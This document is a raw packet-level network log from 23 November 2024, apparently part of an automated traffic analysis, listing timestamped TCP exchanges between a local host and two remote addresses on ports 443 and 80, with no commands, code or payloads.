                                                                                                                                                          Nov 23, 2024 12:47:13.956553936 CET49732443192.168.2.4104.20.3.235
                                                                                                                                                          Nov 23, 2024 12:47:13.957379103 CET49732443192.168.2.4104.20.3.235
                                                                                                                                                          Nov 23, 2024 12:47:13.960222960 CET49733443192.168.2.4104.20.3.235
                                                                                                                                                          Nov 23, 2024 12:47:13.960304022 CET44349733104.20.3.235192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:13.960395098 CET49733443192.168.2.4104.20.3.235
                                                                                                                                                          Nov 23, 2024 12:47:13.960659981 CET49733443192.168.2.4104.20.3.235
                                                                                                                                                          Nov 23, 2024 12:47:13.960685968 CET44349733104.20.3.235192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:13.972202063 CET44349731104.20.3.235192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:13.972440958 CET44349731104.20.3.235192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:13.976383924 CET49731443192.168.2.4104.20.3.235
                                                                                                                                                          Nov 23, 2024 12:47:13.976656914 CET49731443192.168.2.4104.20.3.235
                                                                                                                                                          Nov 23, 2024 12:47:13.980266094 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:14.099852085 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:14.100435972 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:14.100522995 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:14.220160961 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.223310947 CET44349733104.20.3.235192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.233027935 CET49733443192.168.2.4104.20.3.235
                                                                                                                                                          Nov 23, 2024 12:47:15.233092070 CET44349733104.20.3.235192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.408783913 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.408909082 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.408962011 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.408982992 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.408998013 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.409032106 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.409065008 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.409065008 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.409099102 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.409120083 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.409133911 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.409166098 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.409185886 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.409200907 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.409257889 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.528908014 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.529055119 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.529139042 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.619398117 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.619577885 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.619653940 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.623573065 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.623668909 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.623742104 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.632013083 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.632162094 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.632226944 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.640410900 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.640562057 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.640625000 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.648822069 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.648986101 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.649056911 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.657258987 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.657399893 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.657469034 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.665678978 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.665752888 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.665822029 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.674113989 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.674227953 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.674290895 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.677758932 CET44349733104.20.3.235192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.678004980 CET44349733104.20.3.235192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.678081989 CET49733443192.168.2.4104.20.3.235
                                                                                                                                                          Nov 23, 2024 12:47:15.678438902 CET49733443192.168.2.4104.20.3.235
                                                                                                                                                          Nov 23, 2024 12:47:15.681816101 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.682507038 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.682622910 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.682696104 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.690967083 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.691003084 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.691077948 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.699353933 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.699390888 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.699456930 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.809937954 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.810046911 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.810266972 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.830034971 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.830183029 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.830250978 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.832714081 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.832854033 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.832959890 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.838176012 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.838260889 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.838326931 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.843559027 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.843719006 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.843791962 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.849070072 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.849128962 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.849189043 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.854424953 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.854628086 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.854691029 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.859852076 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.859955072 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.860014915 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.865267038 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.865463972 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.865550041 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.870687962 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.870812893 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.870893955 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.876110077 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.876254082 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.876331091 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.881558895 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.881678104 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.881752014 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.886939049 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.887074947 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.887134075 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.892368078 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.892492056 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.892579079 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.897789001 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.897921085 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.897983074 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.903203011 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.903359890 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.903423071 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:15.908602953 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.929754972 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:15.953973055 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.045583010 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.045682907 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.045751095 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.048099995 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.048214912 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.048285007 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.053370953 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.053409100 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.053478956 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.058482885 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.058538914 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.058619976 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.063577890 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.063653946 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.063733101 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.069014072 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.069091082 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.069197893 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.073785067 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.073904991 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.073967934 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.078933001 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.079010010 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.079071045 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.084108114 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.084228992 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.087857008 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.089140892 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.089323044 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.089395046 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.094290972 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.094346046 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.094405890 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.099374056 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.099483967 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.099541903 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.104485035 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.104604006 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.104665041 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.109600067 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.109745026 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.109802008 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.114696980 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.114804029 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.114872932 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.119817019 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.119962931 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.120027065 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.124922991 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.125042915 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.125109911 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.130069971 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.130235910 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.130295038 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.135128021 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.135282993 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.135356903 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.140681028 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.140790939 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.140909910 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.145390987 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.145517111 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.145576000 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.150605917 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.150751114 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.150810003 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.155616045 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.155673027 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.155725956 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.160738945 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.160841942 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.160917044 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.165855885 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.165935993 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.166021109 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.251095057 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.251241922 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.251331091 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.253354073 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.253484011 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.253547907 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.256946087 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.257049084 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.257101059 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.261538029 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.261708975 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.261769056 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.266625881 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.266834974 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.266891956 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.271157026 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.271224976 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.271290064 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.275379896 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.275494099 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.275543928 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.280052900 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.280148983 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.280203104 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.284629107 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.284742117 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.284796000 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.289242029 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.289376020 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.289446115 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.293854952 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.294028044 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.294111013 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.298475981 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.298614025 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.298670053 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.302170038 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.302278042 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.302335024 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.305778980 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.305882931 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.305943966 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.311446905 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.311615944 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.311675072 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.316827059 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.316999912 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.317095041 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.319514036 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.319570065 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.319638014 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.321993113 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.322118044 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.322205067 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.324805975 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.324981928 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.325040102 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.327723980 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.327766895 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.327827930 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.330984116 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.331124067 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.331182957 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.334713936 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.334809065 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.334872961 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.338192940 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.338351011 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.338406086 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.341789961 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.341989994 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.342048883 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.345462084 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.345535994 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.345597029 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.349014997 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.349118948 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.349178076 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.352694035 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.352746010 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.352804899 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.356288910 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.356395960 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.356450081 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.360018969 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.360122919 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.360172033 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.363430023 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.363559961 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.363611937 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.367010117 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.367152929 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.367232084 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.370691061 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.370879889 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.370935917 CET4973480192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:16.374195099 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.374325037 CET8049734192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:16.374382019 CET4973480192.168.2.4192.81.132.76
